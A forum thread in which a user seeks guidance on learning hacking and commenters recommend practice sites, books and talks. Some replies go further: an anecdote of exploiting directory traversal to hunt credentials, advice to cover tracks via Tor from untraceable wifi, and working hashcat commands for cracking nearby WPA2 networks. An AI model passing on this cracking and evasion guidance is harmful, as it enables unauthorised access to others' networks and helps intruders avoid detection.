15
submitted 1 week ago by [email protected] to c/[email protected]

This may sound like fedposting, so feel free not to respond. I'm asking if people knowledgeable about cybersecurity, penetration testing, etc. could help me learn either through advice or more personal guidance. I'm familiar with Maia Crimew's blog post, but as with most of this stuff it's just vague enough to be difficult for me to push off from. I am really good with computers when using them as intended, but going off the beaten path and finding flaws or footholds is where I struggle. If you have advice or want to guide more closely, you can leave a comment here, a DM, or you can get me on Matrix @cupcake-of-spice:matrix.org

The site hackthebox dot com has battlegrounds with two teams hacking each other's virtual machines while hardening their own. If anyone wants to start a team for that, I'd be up for joining, though at my current state I may not be so much help...

top 9 comments
sorted by: hot top new old
[-] [email protected] 8 points 1 week ago

From zero: pay attention to the news about it and see if you can do the stuff in the news. Like, see a cvss and try to pull it off. You don’t need anyone opposed to you, just see if you can mock up the heists you see in the news in your home.

The best way to understand something is by doing it.

[-] [email protected] 6 points 1 week ago

If you want a grounding in the basics of how computer exploits work, getting your hands on a copy of Hacking: The Art of Exploitation by Jon Erickson is a decent choice. It's an old book, and things have advanced significantly since then, but the stuff it goes over is still the core of how hacking actually works.

[-] [email protected] 3 points 1 week ago* (last edited 1 week ago)

There's no substitute for practice. Start doing these:

https://overthewire.org/wargames/

They have a nice difficulty progression, gentle enough to be effective but not too easy.

[-] [email protected] 3 points 1 week ago* (last edited 1 week ago)

They're a bit outdated, but I very much recommend the Syngress Stealing the Network book series. The first one is just kind of a bunch of short stories, but the later ones have an ongoing narrative. Lib as hell, but interesting and covers some great topics.

Funny story: back around when those books were released all the Syngress books had downloadable content and the Syngress website was using a download.php script that was vulnerable to Directory Traversal. I think I spent a full day or two manually downloading the majority of their website, browsing through scripts, looking for credentials.

Syngress also had some good books on spam and phishing now that I think about it.

[-] [email protected] 3 points 1 week ago
[-] [email protected] 3 points 1 week ago

I just went back to Crimew's post and started looking at some of those.

[-] [email protected] 4 points 1 week ago

Word, I'm not familiar with Crimew but I think I just looked at the post you're referencing and there's some pretty good stuff mentioned. I cut my teeth on phrack back when it was still being passed around on BBSes. (There was an article in 43(?) on stealing a pbx that I got a real kick out of as a kid.) Google dorking is fun for basic exploits.

I would seriously recommend starting with understanding wifi hacking and then how Tor works and how to use it. Learn to anonymize yourself and cover your tracks before you do anything that needs it. Build yourself a pwnagotchi (or an esp32-based alt or a cheap pineapple), learn to use hashcat to crack wpa2 hashes, and then get on Tor from wifi you can't be tracked to. From there you can experiment with ways to bounce from random tor nodes to legit websites that are gonna block those nodes.

Keep in mind a lot of the open source mirrors for major websites, like invidious/xcancel, can serve as alternatives for the major corp websites when you're doing your research. Keep as much of your traffic in Tor as you can by using onion sites. Watch defcon and other conference talks for background in concepts that interest you.

Have fun!

[-] [email protected] 3 points 1 week ago

I've got some understanding of Tor. I've built a pwnagotchi in the past and used good ol' aircrack-ng, but always got stuck with a hash I can't crack. From what I've seen wpa2 doesn't go down easily. I have a lot of information, but not much in the way of organizing it usefully, but that's probably a symptom of having too little or too sparse information.

[-] [email protected] 2 points 1 week ago

Oh word. You're well on your way already. While there's plenty out there that can't be cracked in a reasonable time, I find that half the battle is knowing what to try based on the SSID format. Have you run across this table?

https://forums.hak5.org/topic/39403-table-of-wifi-password-standards/

For example, if spectrum is prevalent in your area, grab a copy of the spectrum-netgear wordlist.

https://github.com/andrewjlamarche/PSKracker/tree/master/dicts/netgear-spectrum

this will run through a combo of adjnoun and then 3 digits for each combo. takes about an hour on a 1050ti

hashcat.exe -m 2500 "C:\hashfile.pcap.hccapx" -a6 netgear-spectrum.txt ?d?d?d

I also always throw phone number combos of my local area codes at it. tbh, this is usually what does it if they've got a custom SSID.

hashcat.exe -m 2500 -a 3 -1 ?d "C:\hashfile.pcap.hccapx" 555?1?1?1?1?1?1?1

Honestly, I totally get it, I've got more fluff in my skull than brains. So it's very hard to keep in mind everything I should. I mostly just had some favorite techniques I relied on to do my basic exploration and then once I have a system I can set my sights on that's when I did research and built a plan of attack. I would say definitely check out those syngress books. In case I didn't express that well enough, they're basically hypothetical scenarios wrapped around actual techniques. Great for getting the juices flowing and thinking big picture and how different techniques can tie in to each other. Definitely read the hackback papers.

In minecraft, I would recommend really sitting down and thinking about what it is you're trying to do with these skills and then build up profiles of the types of organizations you would like to work with in the future. Check their job listings for software and hardware they use, try and build org charts to find out the people you would want to get in contact with, etc. From there, the jhaddix methodology is a great start. https://github.com/jhaddix/tbhm

this post was submitted on 25 May 2025
15 points (100.0% liked)

askchapo

23016 readers
55 users here now

Ask Hexbear is the place to ask and answer ~~thought-provoking~~ questions.

Rules:

  1. Posts must ask a question.

  2. If the question asked is serious, answer seriously.

  3. Questions where you want to learn more about socialism are allowed, but questions in bad faith are not.

  4. Try [email protected] if you're having questions about regarding moderation, site policy, the site itself, development, volunteering or the mod team.

founded 4 years ago
MODERATORS